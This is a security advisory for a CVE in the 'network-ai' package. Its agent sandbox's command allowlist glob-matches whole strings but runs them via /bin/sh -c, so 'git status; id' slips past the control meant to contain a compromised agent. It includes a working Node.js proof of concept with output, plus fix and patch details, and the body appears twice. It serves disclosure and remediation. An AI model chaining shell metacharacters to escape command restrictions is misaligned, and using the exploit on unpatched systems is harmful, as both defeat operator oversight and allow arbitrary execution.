← Back to CVE List
CVE-2026-54051NVD
Vulnerability Summary
## Summary
The agent sandbox gates shell commands behind an allowlist (`SandboxPolicy.isCommandAllowed`), which THREAT_MODEL.md calls the main control against a compromised agent (Adversary 3.2). The allowlist glob-matches the whole command string, but `ShellExecutor` runs that string through `/bin/sh -c`. So any wildcard allow such as `git *`, `npm *` or `node *` also matches `git status; <anything>`, and a scoped command becomes arbitrary execution.
## Root cause
Matching and execution disagree on what a command is. Lines pinned to `40e42d7` (`lib/agent-runtime.ts` is identical to the v5.8.5 tag).
1. `isCommandAllowed` matches the full string, with no tokenizing and no metacharacter check:
https://github.com/Jovancoding/Network-AI/blob/40e42d7a0a966b948953b3c524cf15355d20ef5e/lib/agent-runtime.ts#L248-L260
2. `globMatch` compiles `*` to `.*` and anchors it, so `git *` becomes `^git .*$` and matches `git status; id`:
https://github.com/Jovancoding/Network-AI/blob/40e42d7a0a966b948953b3c524cf15355d20ef5e/lib/agent-runtime.ts#L353-L360
3. `ShellExecutor.execute` only checks `isCommandAllowed`, never `requiresApproval`:
https://github.com/Jovancoding/Network-AI/blob/40e42d7a0a966b948953b3c524cf15355d20ef5e/lib/agent-runtime.ts#L387-L391
4. `spawnCommand` runs the approved string via `/bin/sh -c`, so `;`, `|` and `$(...)` are interpreted by the shell:
https://github.com/Jovancoding/Network-AI/blob/40e42d7a0a966b948953b3c524cf15355d20ef5e/lib/agent-runtime.ts#L427-L431
## Reachability
Any agent or caller allowed to run commands hits this when the operator allowlist has a wildcard entry. A plain `git *` is enough. No fresh-install precondition and no extra misconfiguration.
## PoC
Installs `network-ai@5.8.5`, allows `git *`, then runs `git status; id > marker`.
The allowlist accepts it and the injected `id` runs.
Run: `npm i network-ai@5.8.5 && node poc-316.js`
```js
'use strict';
const os = require('os');
const fs = require('fs');
const path = require('path');
const { SandboxPolicy, ShellExecutor } = require('network-ai');
(async () => {
const base = fs.mkdtempSync(path.join(os.tmpdir(), 'nai-poc-316-'));
const marker = path.join(base, 'PWNED-316.txt');
const policy = new SandboxPolicy({ basePath: base, allowedCommands: ['git *'] });
const sh = new ShellExecutor(policy);
const payload = `git status; id > ${marker}; echo INJECTED`;
console.log('version:', require('network-ai/package.json').version);
console.log('allowed:', policy.isCommandAllowed(payload));
await sh.execute(payload);
const ran = fs.existsSync(marker);
console.log('injected id ran:', ran, ran ? fs.readFileSync(marker, 'utf8').trim() : '');
console.log(ran ? 'VULNERABLE' : 'not reproduced');
process.exit(ran ? 0 : 1);
})().catch(err => { console.error(err); process.exit(3); });
```
Output:
```
version: 5.8.5
allowed: true
injected id ran: true uid=501(alex) gid=20(staff) groups=20(staff),...
VULNERABLE
```
## Impact
Arbitrary command execution as the orchestrator process. It defeats the one control meant to contain a compromised agent, so any agent with a single wildcard allow (`git *`, `npm *`, `node *`) can run anything. `node *` and `npm *` are direct code exec even without metacharacters.
## Possible fix
Do not run agent commands through a shell. Parse to argv and `spawn(file, args, { shell: false })`, allowlist on the executable plus argument patterns, and reject shell metacharacters. Anchoring the regex alone is not enough; the whole-string match plus `/bin/sh -c` is the bug.
## Patch
Fixed in **v5.9.1** (commit `379f776`). `ShellExecutor` now executes via `spawn(file, args, { shell: false })` using a quote-aware parsed argv, so no shell is invoked. `SandboxPolicy.isCommandAllowed` and the new `SandboxPolicy.tokenizeCommand` reject any unquoted shell metacharacter (`; & | $ ` ` ` ( ) < > { }` newline) or unterminated quote **before** the allowlist glob match; quoted metacharacters are preserved as literal argument data.
**Remediation:** upgrade to `network-ai@5.9.1` or later. As defense in depth, avoid broad wildcard allowlist entries such as `node *` / `npm *` which are direct code execution by design.
The agent sandbox gates shell commands behind an allowlist (`SandboxPolicy.isCommandAllowed`), which THREAT_MODEL.md calls the main control against a compromised agent (Adversary 3.2). The allowlist glob-matches the whole command string, but `ShellExecutor` runs that string through `/bin/sh -c`. So any wildcard allow such as `git *`, `npm *` or `node *` also matches `git status; <anything>`, and a scoped command becomes arbitrary execution.
## Root cause
Matching and execution disagree on what a command is. Lines pinned to `40e42d7` (`lib/agent-runtime.ts` is identical to the v5.8.5 tag).
1. `isCommandAllowed` matches the full string, with no tokenizing and no metacharacter check:
https://github.com/Jovancoding/Network-AI/blob/40e42d7a0a966b948953b3c524cf15355d20ef5e/lib/agent-runtime.ts#L248-L260
2. `globMatch` compiles `*` to `.*` and anchors it, so `git *` becomes `^git .*$` and matches `git status; id`:
https://github.com/Jovancoding/Network-AI/blob/40e42d7a0a966b948953b3c524cf15355d20ef5e/lib/agent-runtime.ts#L353-L360
3. `ShellExecutor.execute` only checks `isCommandAllowed`, never `requiresApproval`:
https://github.com/Jovancoding/Network-AI/blob/40e42d7a0a966b948953b3c524cf15355d20ef5e/lib/agent-runtime.ts#L387-L391
4. `spawnCommand` runs the approved string via `/bin/sh -c`, so `;`, `|` and `$(...)` are interpreted by the shell:
https://github.com/Jovancoding/Network-AI/blob/40e42d7a0a966b948953b3c524cf15355d20ef5e/lib/agent-runtime.ts#L427-L431
## Reachability
Any agent or caller allowed to run commands hits this when the operator allowlist has a wildcard entry. A plain `git *` is enough. No fresh-install precondition and no extra misconfiguration.
## PoC
Installs `network-ai@5.8.5`, allows `git *`, then runs `git status; id > marker`.
The allowlist accepts it and the injected `id` runs.
Run: `npm i network-ai@5.8.5 && node poc-316.js`
```js
'use strict';
const os = require('os');
const fs = require('fs');
const path = require('path');
const { SandboxPolicy, ShellExecutor } = require('network-ai');
(async () => {
const base = fs.mkdtempSync(path.join(os.tmpdir(), 'nai-poc-316-'));
const marker = path.join(base, 'PWNED-316.txt');
const policy = new SandboxPolicy({ basePath: base, allowedCommands: ['git *'] });
const sh = new ShellExecutor(policy);
const payload = `git status; id > ${marker}; echo INJECTED`;
console.log('version:', require('network-ai/package.json').version);
console.log('allowed:', policy.isCommandAllowed(payload));
await sh.execute(payload);
const ran = fs.existsSync(marker);
console.log('injected id ran:', ran, ran ? fs.readFileSync(marker, 'utf8').trim() : '');
console.log(ran ? 'VULNERABLE' : 'not reproduced');
process.exit(ran ? 0 : 1);
})().catch(err => { console.error(err); process.exit(3); });
```
Output:
```
version: 5.8.5
allowed: true
injected id ran: true uid=501(alex) gid=20(staff) groups=20(staff),...
VULNERABLE
```
## Impact
Arbitrary command execution as the orchestrator process. It defeats the one control meant to contain a compromised agent, so any agent with a single wildcard allow (`git *`, `npm *`, `node *`) can run anything. `node *` and `npm *` are direct code exec even without metacharacters.
## Possible fix
Do not run agent commands through a shell. Parse to argv and `spawn(file, args, { shell: false })`, allowlist on the executable plus argument patterns, and reject shell metacharacters. Anchoring the regex alone is not enough; the whole-string match plus `/bin/sh -c` is the bug.
## Patch
Fixed in **v5.9.1** (commit `379f776`). `ShellExecutor` now executes via `spawn(file, args, { shell: false })` using a quote-aware parsed argv, so no shell is invoked. `SandboxPolicy.isCommandAllowed` and the new `SandboxPolicy.tokenizeCommand` reject any unquoted shell metacharacter (`; & | $ ` ` ` ( ) < > { }` newline) or unterminated quote **before** the allowlist glob match; quoted metacharacters are preserved as literal argument data.
**Remediation:** upgrade to `network-ai@5.9.1` or later. As defense in depth, avoid broad wildcard allowlist entries such as `node *` / `npm *` which are direct code execution by design.
CVSS v3.1 Base Metrics
Attack VectorNetwork
Attack ComplexityLow
Privileges RequiredLow
User InteractionNone
ScopeChanged
ConfidentialityHigh
IntegrityHigh
AvailabilityHigh